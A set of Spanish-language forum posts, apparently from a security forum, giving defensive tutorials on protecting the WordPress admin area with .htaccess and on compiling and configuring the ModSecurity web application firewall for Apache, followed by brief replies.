Con estos dos ficheros ya tenemos una nueva capa de autenticación para acceder a la administración de WordPress. En el caso de que utilicemos las funcionalidades Ajax de la administración de WordPress se recomienda añadir también lo siguiente al fichero .htaccess del directorio "wp-admin":
Citar<Files admin-ajax.php>
    Order allow,deny
    Allow from all
    Satisfy any
</Files>

Y finalmente, si tras realizar estos cambios recibimos un error 404 al acceder a la administración o un bucle "Too many redirects error", añadimos la siguiente línea al fichero .htaccess principal del sitio (ojo, al principal, no al de wp-admin):

CitarErrorDocument 401 default

Existen otras opciones, como modificar el nombre del directorio "wp-admin" para dificultar aún más su exposición a ataques, no obstante con lo comentado en esta entrada debería ser suficiente para tener seguro nuestro acceso a la administración.
#8
gracias espero ayudar mas
#9

A la hora de instalar mod_security en sistemas de 64 bits podemos encontrarnos con problemas al intentar hacerlo a través de apxs. Por ello, tenemos que recurrir a la instalación mediante compilación. En este caso bajo un centos 5 x86_64.
Lo primero que hacemos es descargar las fuentes:

Código: bash
wget http://www.modsecurity.org/download/modsecurity-apache_2.5.13.tar.gz



Descomprimimos y nos ubicamos en la carpeta apache2 (para versiones 2 de Apache):

Código: bash
tar -xzvf modsecurity-apache_2.5.13.tar.gz 

Código: bash
cd modsecurity-apache_2.5.13/apache2


Llega el momento de compilar, en este caso la configuración me ha obligado a especificar la ruta tanto de apxs como de apr-config y apu-config:

Citar# ./configure --with-apxs=/usr/local/apache/bin/apxs \
--with-apr=/usr/local/apache/bin/apr-1-config \
--with-apu=/usr/local/apache/bin/apu-1-config

Si no recibimos ningún error compilamos:

Código: bash
make



E instalamos:

Código: bash
make install



Llega el momento de añadir a httpd.conf la carga de los módulos necesarios y la llamada al fichero de configuración:

CitarLoadFile /usr/lib/libxml2.so
LoadModule security2_module modules/mod_security2.so

Y la llamada al fichero de configuración que podéis llamar como queráis:

CitarInclude conf/modsec2.conf

Ya quedará únicamente crear o copiar el fichero modsec2.conf y copiar las reglas que queramos a la ruta deseada.



modsec2.conf:

Citar<IfModule mod_security2.c>
SecRuleEngine On
SecFilterCheckURLEncoding On
SecFilterForceByteRange 0 255
SecAuditEngine RelevantOnly
SecAuditLog logs/modsec_audit.log
SecDebugLog logs/modsec_debug_log
SecDebugLogLevel 0
SecDefaultAction "phase:2,deny,log,status:403"
#Redireccion a html de seguridad
ErrorDocument 403 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
SecRule REMOTE_ADDR "^127.0.0.1$" nolog,allow
#Includes de configuracion
Include "/usr/local/apache/conf/modsecurity_rules/*.conf"
</IfModule>

Finalmente comprobamos que la sintaxis de los ficheros de configuración es correcta y ya podemos arrancar Apache y hacer pruebas con mod_security:

Código: bash
/etc/init.d/httpd configtest

Syntax OK

Fuente: # No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#10
Buenas usuarios de Under este es mi primer post es una recopilación que eh sacado de varios foros ya para seguridad web con Mod-Security quii Les dejare como se instala y configura..

ModSecurity es un firewall de aplicaciones Web embebible que ejecuta como módulo del servidor web Apache, provee protección contra diversos ataques hacia aplicaciones Web y permite monitorear tráfico HTTP, así como realizar análisis en tiempo real sin necesidad de hacer cambios a la infraestructura existente
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Compilación:
Bajamos la última versión estable y compilamos:

Código: bash
cd /root/descargas
wget http://www.modsecurity.org/download/modsecurity-apache_1.9.4.tar.gz
tar -zxf modsecurity-apache_1.9.4.tar.gz


Para compilar, hemos de distinguir entre apache 1.3.x y apache 2.x:

Apache 1.3.x:

Código: bash
cd modsecurity-apache_1.9.4/apache1
/usr/local/apache/bin/apxs -cia mod_security.c


En el último comando tener en cuenta la ruta a vuestro apache.

Apache 2.x:

Código: bash
cd modsecurity-apache_1.9.4/apache2
/usr/local/apache/bin/apxs -cia mod_security.c


En el último comando tener en cuenta la ruta a vuestro apache.

Ya debería aparecer en nuestro httpd.conf el módulo cargado:
CitarLoadModule security_module    libexec/mod_security.so

Configuración:
Personalmente siempre me gusta poner las configuraciones de este tipo de módulos en ficheros separados, pues suelen ser extensas y resulta incómodo en el httpd.conf, así que añadimos:

CitarInclude "/usr/local/apache/conf/mod_security.conf"

Respecto a las reglas, es todo un mundo, resulta difícil saber que reglas son las mejores para cada tipo de servidor, no obstante las que ofrecen en Got Root, además de que se actualizan periódicamente, son lo suficientemente restrictivas para proteger tu servidor Apache de forma excelente. Una vez añadidas, simplemente se trata de optimizarlas a vuestras necesidades, eliminando las que no deseeis.

Podéis descargar las últimas reglas en los siguientes enlaces

Mod Security 2.5

Apache 2.x rules: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Para más información, y reglas de distintas versiones de ModSecurity acceder a su sitio web. No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Voy a explicar unas cuantas directivas de configuración, pero son muy extensas, conviene estudiarlas y configurarlas al gusto de cada uno:

Fichero en el que guardaremos el log de los filtrados realizados por mod_security

Citar# The name of the audit log file
SecAuditLog logs/mod_security.log

Acción a realizar por defecto cuando se detecte un ataque, en este caso denegamos la petición web, lanzamos un error 500 y guardamos en el log el tipo de ataque:

Citar# Action to take by default
# SecFilterDefaultAction "deny,log,status:406"
# For log only: SecFilterDefaultAction "pass,log"
SecFilterDefaultAction "deny,log,status:500

Ips que no se verán afectadas por las reglas establecidas en mod_security (en este caso local, se puede asignar la IP que queramos)

Citar# Do not log local requests and allows them all
SecFilterSelective REMOTE_ADDR "^127.0.0.1$" nolog,allow

Personalizar la página de error a la que mandemos las peticiones web filtradas, que en nuestro caso hemos configurado con un error 500:

CitarErrorDocument 500 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

no es algo para lo que puedan decir no mas ataques ddos en su web si ayuda a la hora de protegernos la ayuda mas pequeña es importante gracias espero les guste mi pequeño post

EDIT: Usa adecuadamente las mayúsculas Atte: Snifer
#11
Esta muy bueno zan sigue asi
#12
Hacking / Re:ParameterFuzz v1.1
Junio 23, 2013, 03:59:30 PM
Se Ve Muy Bueno
#13
Me Gusta Esta Mas Que Bueno ise Las Pruebas Igualmente En centos Y Me Andubo De marivilla No Caia Con Dos VPS Nada Perfecto +10 Tu Post